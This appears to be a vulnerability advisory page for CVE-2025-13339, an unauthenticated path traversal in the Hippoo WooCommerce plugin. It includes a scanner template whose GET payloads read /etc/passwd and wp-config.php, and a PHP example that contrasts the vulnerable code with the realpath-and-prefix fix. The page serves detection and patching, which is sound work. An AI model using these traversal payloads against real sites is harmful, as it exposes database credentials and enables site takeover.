
Hippoo Mobile App for WooCommerce <= 1.7.1 - Unauthenticated Arbitrary File Read

CVE-2025-13339
Early Release

Description

The Hippoo Mobile App for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to and including 1.7.1 via the template_redirect() function. The plugin registers 'hippoo_serve' as a WordPress query variable and uses it to serve PWA files from the pwa/ directory. In vulnerable versions, the user-supplied value is concatenated directly into a filesystem path without any sanitization or directory confinement check, then passed to readfile(). This allows unauthenticated attackers to read arbitrary files on the server by injecting directory traversal sequences (../).

Severity

High

CVSS Score

7.5

Exploit Probability

0%

Affected Product

hippoo-mobile-app-for-woocommerce

Published Date

June 11, 2026

Template Author

pussycat0x

CVE-2025-13339.yaml
id: CVE-2025-13339

info:
  name: Hippoo Mobile App for WooCommerce <= 1.7.1 - Unauthenticated Arbitrary File Read
  author: pussycat0x
  severity: high
  description: |
    The Hippoo Mobile App for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to and including 1.7.1 via the template_redirect() function. The plugin registers 'hippoo_serve' as a WordPress query variable and uses it to serve PWA files from the pwa/ directory. In vulnerable versions, the user-supplied value is concatenated directly into a filesystem path without any sanitization or directory confinement check, then passed to readfile(). This allows unauthenticated attackers to read arbitrary files on the server by injecting directory traversal sequences (../).
  impact: |
    An unauthenticated attacker can read any file readable by the web server process (www-data), including wp-config.php (database credentials, authentication keys and salts), /etc/passwd, server configuration files, and application source code. Exfiltration of wp-config.php alone enables database compromise and WordPress cookie forgery for full site takeover.
  remediation: Update the Hippoo Mobile App for WooCommerce plugin to version 1.7.2 or later. The patch adds realpath() canonicalization and a strpos() prefix check to confine file reads to the pwa/ directory.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hippoo/hippoo-mobile-app-for-woocommerce-171-unauthenticated-arbitrary-file-read
    - https://plugins.trac.wordpress.org/changeset/3412701/
    - https://patchstack.com/database/wordpress/plugin/hippoo/vulnerability/wordpress-hippoo-mobile-app-for-woocommerce-plugin-1-7-1-unauthenticated-arbitrary-file-read-vulnerability
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-13339
    cwe-id: CWE-22
    epss-score: 0.00105
    epss-percentile: 0.28031
  metadata:
    verified: true
    max-request: 2
    vendor: hippoo
    product: hippoo-mobile-app-for-woocommerce
    framework: wordpress
    shodan-query: http.component:"WordPress"
    fofa-query: body="hippoo"
  tags: cve,cve2025,wordpress,wp-plugin,hippoo,lfi,woocommerce

http:
  - method: GET
    path:
      - "{{BaseURL}}/?hippoo_serve=../../../../../../../etc/passwd"
      - "{{BaseURL}}/?hippoo_serve=../../../../wp-config.php"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body) || contains_all(body, 'DB_NAME', 'DB_PASSWORD')"
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100ec72f94d3887a98a1a1942acad242c9fd319ff325eaaa374a109b3eaae747521022100af738e871bf6c78fb61e494a506be94865265db56b8f92a9c4a955063f47b1e0:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID: CVE-2025-13339
CWE ID: CWE-22

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hippoo/hippoo-mobile-app-for-woocommerce-171-unauthenticated-arbitrary-file-read
https://plugins.trac.wordpress.org/changeset/3412701/
https://patchstack.com/database/wordpress/plugin/hippoo/vulnerability/wordpress-hippoo-mobile-app-for-woocommerce-plugin-1-7-1-unauthenticated-arbitrary-file-read-vulnerability

Remediation Steps

Update the Hippoo Mobile App for WooCommerce plugin to version 1.7.2 or later. The patch adds realpath() canonicalization and a strpos() prefix check to confine file reads to the pwa/ directory.
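As an added illustration of the flaw outlined in the Description and the fix described under Remediation, the following PHP is example code and not the Hippoo plugin's own source: a minimal template_redirect handler that serves files from a plugin's pwa/ directory by the hippoo_serve query variable, with the vulnerable path resolution placed beside a hardened one that applies realpath() canonicalization and a strpos() prefix check. Names prefixed hippoo_demo_ and the content-type allowlist are assumptions; the allowlist is an extra layer beyond the stated patch. The CLI branch at the end is a self-check that runs outside WordPress.

```php
<?php
// Added example, not the Hippoo plugin's own code. Names prefixed
// hippoo_demo_ and the extension allowlist are assumptions for
// illustration; only the realpath() + prefix check mirrors the advisory.

// Vulnerable shape described in the advisory: the query value is glued
// onto the pwa/ path and handed to readfile(), so "../" escapes the directory.
function hippoo_demo_resolve_vulnerable(string $pwa_dir, string $requested): string {
    return $pwa_dir . '/' . $requested;
}

// Hardened shape: canonicalize both base and target, then require the
// target to sit strictly below the base. Returns null for anything else.
function hippoo_demo_resolve_hardened(string $pwa_dir, string $requested): ?string {
    $base = realpath($pwa_dir);
    if ($base === false || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $full = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($full === false) {
        return null; // nonexistent target, or traversal into nowhere
    }
    // Compare against base plus a separator so a sibling such as
    // "pwa-old/" cannot pass a bare strpos($full, $base) check.
    if (strpos($full, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null; // canonical path left the pwa/ directory
    }
    return $full;
}

// Request handler hooked on template_redirect. The WordPress functions used
// here are real; the surrounding plugin structure is assumed.
function hippoo_demo_serve(string $pwa_dir): void {
    $requested = (string) get_query_var('hippoo_serve', '');
    if ($requested === '') {
        return; // not our request, let WordPress continue
    }
    $full = hippoo_demo_resolve_hardened($pwa_dir, $requested);
    if ($full === null || !is_file($full)) {
        status_header(404);
        exit;
    }
    // Extra layer beyond the stated patch: serve only the types a PWA needs.
    $allowed = [
        'json'        => 'application/json',
        'webmanifest' => 'application/manifest+json',
        'js'          => 'application/javascript',
        'png'         => 'image/png',
    ];
    $ext = strtolower(pathinfo($full, PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        status_header(404);
        exit;
    }
    header('Content-Type: ' . $allowed[$ext]);
    header('X-Content-Type-Options: nosniff');
    readfile($full);
    exit;
}

if (function_exists('add_action')) {
    // Inside WordPress: register the query variable and hook the handler.
    add_filter('query_vars', function (array $vars): array {
        $vars[] = 'hippoo_serve';
        return $vars;
    });
    add_action('template_redirect', function (): void {
        hippoo_demo_serve(plugin_dir_path(__FILE__) . 'pwa');
    });
} elseif (PHP_SAPI === 'cli') {
    // Self-check outside WordPress: build a throwaway pwa/ dir and compare resolvers.
    $pwa = sys_get_temp_dir() . '/hippoo_demo_' . getmypid() . '/pwa';
    mkdir($pwa, 0700, true);
    file_put_contents($pwa . '/manifest.json', '{"name":"demo"}');
    $escape = str_repeat('../', 8) . 'etc/passwd';
    // Vulnerable resolver returns the raw concatenation; nothing is read here.
    printf("vulnerable: %s\n", hippoo_demo_resolve_vulnerable($pwa, $escape));
    // Hardened resolver: realpath() collapses the traversal to a path outside
    // $base, so the prefix check rejects it; an in-directory file passes.
    var_dump(hippoo_demo_resolve_hardened($pwa, $escape));
    var_dump(hippoo_demo_resolve_hardened($pwa, 'manifest.json'));
    unlink($pwa . '/manifest.json');
    rmdir($pwa);
    rmdir(dirname($pwa));
}
```

The point the self-check makes is that realpath() on its own is not a confinement: a traversal sequence canonicalizes to a perfectly valid absolute path such as /etc/passwd, and only the prefix comparison against the canonical base plus a trailing separator rejects it. Checking realpath() of the base as well matters because a symlinked plugin directory would otherwise never match its own resolved files.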